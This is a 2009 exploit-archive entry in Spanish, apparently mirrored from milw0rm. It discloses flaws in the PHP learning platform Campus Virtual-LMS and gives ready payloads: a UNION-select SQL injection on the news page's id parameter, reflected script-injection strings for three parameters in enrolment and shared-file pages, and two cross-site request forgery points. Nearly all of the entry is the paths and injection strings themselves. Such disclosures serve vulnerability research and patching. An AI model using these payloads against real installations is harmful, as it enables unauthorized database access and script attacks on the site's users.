[] NeoSense
E X P L O I T S
title author type platform port cve id

campus virtual-lms - Cross-Site Scripting / SQL Injection

Author: Yasión
type: webapps
platform: php
port: 
date_added: 2009-06-11 
date_updated:  
verified: 1 
codes: OSVDB-55307;CVE-2009-2150;OSVDB-55306;CVE-2009-2149;OSVDB-55171;OSVDB-55170;CVE-2009-2148;OSVDB-55169 
tags: 
aliases:  
screenshot_url:  
application_url: 
+-----------------------------------------------------------------------------+
LMS:   Campus Virtual-LMS
WEB:   http://campusvirtualcomputrade.cae.net

Autor: Yasión
Fecha: 12 jun 2009
+-----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] SQLi
 -----------------------------------------------------------------------------+
   Archivo: news/index.php [no logged]
   GET: ?id
   Inyección: -1 union select 1,2,3,4,5,6,7
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] XSS
 -----------------------------------------------------------------------------+
   Archivo: enrolments/step1.php [no logged]
   GET: ?courseid
   Inyección: 1"><script>alert(/xD/.source)</script>

   Archivo: files/shared_list.php [logged]
   GET/POST: ?search
   Inyección: "><script>alert(/xD/.source)</script><!--

   Archivo: files/shared_list.php [logged]
   GET: ?siteid
   Inyección: "><script>alert(/xD/.source)</script><!--
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] CSRF
 -----------------------------------------------------------------------------+
   Archivo: login/logout.php
   Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un
   link...

   Archivo: enrolments/step2.php
   GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
   Info: Añade o elimina [ADD/DELETE] el curso identificado por COURSEID a la
   cesta identificada por ODERID.    Sería necesario conocer por adelantado la
   cesta del usuario. (No explotable)
 -----------------------------------------------------------------------------+

+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+

# milw0rm.com [2009-06-12]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.